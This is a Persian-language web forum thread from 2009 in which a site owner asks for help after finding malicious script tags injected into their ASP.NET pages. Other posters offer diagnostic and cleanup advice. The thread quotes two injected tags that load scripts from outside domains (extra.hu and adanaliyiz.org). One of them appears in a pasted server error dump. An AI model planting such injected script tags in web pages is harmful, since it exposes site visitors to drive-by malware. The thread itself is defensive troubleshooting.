از کلاینت های ftp فعلا استفاده نکن اگر شک داری
وب بیس کار کن رو Ftp
از کلاینت های ftp فعلا استفاده نکن اگر شک داری
وب بیس کار کن رو Ftp
ببخشيد منظورتون رو متوجه نمي شم ميشه بيشتر راهنمايي بفرماييد؟ وب بيس كار كن يعني چي؟ من سري قبل از طريق كنترل پنل سايت ويرايش روي فايل هام رو انجام دادم ولي باز امروز كه نگاه كردم ديدم سايت به مشكل خورده. مي خوام مطمئن بشم ببينم مشكل از سكيوريتي سرور هستش يا واقعا سيستم خودمون ويروس داره؟؟
از یه طرف من با این مدل ویروس برخورد کردم و دیدم کارهای مشابه رو ...
از طرفی هم این کدی که شما دادی یعنی :
script src=http://taemkft.extra.hu/sitebuilder/24.php
رو توی گوگل سرچ کردم و Result نداد یعنی اگر ویروس باشه حتما باید افرادی مثل شما دچار مشکل شده باشند .
یادتون نره این داستان ربطی به FTP نداره ، اگر پشتیبانی گفته از جای دیگه وصل شده بگو پسورد رو عوض کنه . به فرض هم که از جای دیگه وصل شده باشن پسورد FTP رو از کچا آوردن ؟
پس نتیجه میگیریم یا سیستم خود شما ویروس داره و صفحات ASP رو روی سیستم شما آلوده میکنه و شما هم آپلود میکنی ، یا سیستم شما به نوعی آلوده شده و پسورد هایی که میزنید لو میره و یا اون آقا سروش باگ یا ویروس داره و چرت و پرت میگه
پیشنهاد من :
1. کاسپراسکی ( حتی شده نسخه ی 30 روزه ) رو دانلود کن ، ویندوز سیستم خودت رو عوض کن و بلافاصله کاسپر رو نصب کن و همه ی درایوها رو اسکن کن
2. سورس صفحات سالم رو دوباره به سرور آپلود کن و مطمعن شو همه صفحات سرور سالمه .
3. پسورد FTP و پنل رو بعد از این کار عوض کن
اگر باز مشکلی پیش اومد زنگ بزن به اون شرکت هاستینگ هر چی دلت میخواد بگو
ویرایش توسط masterweb : 2009-12-04 در ساعت 12:05 AM
میتونی یه کاره دیگه هم انجام بدین میشه ادرس وب سایت خودتونو بدین ببینم و با چی سر کله داری جوملا یا دیتا لایف یا چیزه دیگه ای من خودم رو امنیت کار میکنم و میتونم مسیرها رو ببندم
میتونی یه کاره دیگه هم انجام بدین میشه ادرس وب سایت خودتونو بدین ببینم و با چی سر کله داری جوملا یا دیتا لایف یا چیزه دیگه ای من خودم رو امنیت کار میکنم و میتونم مسیرها رو ببندم
________________________________________________
کاری رو که نمی تونی انجام بدی برو یاد بگیر
با تشکر
Server Error in '/' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.
Source Error:
Line 72: </asp:Content>Line 73: Line 74: <script src=http://adanaliyiz.org/cache/denemelogo2.php ></script>
Source File: /mainfa.aspx Line: 74
Version Information: Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
اين تگ جديدا اضافه شده: باز به مشكل برخورد كرديم. به نظر شما اين ويروس اگه روي سيستم خودم باشه بايد بقيه فايل هايي كه در دات نت باهاشون كار مي كنم رو هم آلوده كنه يا نه؟؟ اگه رو سرور باشه خود فايل ويروس تو فولدر روت بايد باشه؟ يه چيزي مثل dll exe vbs يا ... ؟؟؟
Server Error in '/' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.
Source Error:
Line 72: </asp:ContentLine 73:Line 74: <script src=http://adanaliyiz.org/cache/denemelogo2.php ></script
Source File: /mainfa.aspx Line: 74
Version Information: Microsoft .NET Framework Version:2.0.50727.3603; ASP.NET Version:2.0.50727.3082
تو اين سايت ها به روش هاي آسيب زدن به سايت ها مشابه مشكل من اشاره شده گفتم شايد بد نباشه دوستان هم اطلاع داشته باشن
http://www.wewatchyourwebsite.com/wordpress/?p=278
سلام
دوست عزيز فكر كنم مشكل از هاست باشه
اگه نسخه پشتيبان مطمئين داري رو يه هاست ديگه تست كن
به مدير هاست بگو پنل شما رو يه بار حذف كنه و دوباره بسازه و از اول آپلود كنيد
اميد وارم درست بشه
حق با ایشونه اگه واقعا malware باشه که احتمالشم هست حتی NOD32 که خودم بهش ایمان دارم ممکنه نتوته کاری واستون بکنه....همون روشهای دستی بهترین راهه ولی اگه اطمینان دارین که حتما از طریق victim,ftp شدین حتما یه سری به این لیست بزن..از لحاظ امنیتی خیلی خوب کار نکردین ...اون IP رو هم بیخیالش شین فایده ای نداره ... وقت تلف کردنه .اصل اول هر هکری نفوذ نیست ...ردپا پاک کردنو رد گم کردنه...
Top 100 Network Security Tools
Top 100 Network Security Tools....واسه همه ی OS ها! ممکنه باعث شه یه تجدید نظری بکنید رو امنیت سرورتون
موفق باشین
البته بازم اگه میخواین رد IP رو بگیربن به نظرم بهترین سایتی که Whois انجام میده Whois lookup and Domain name search اینجاست چون فکر کنم اگه بخوای رد ISP رو بگیری این بتونه بهتر کمکتون کنه....
ویرایش توسط SADEGH65 : 2009-12-22 در ساعت 11:20 PM علت: ادغام پست ها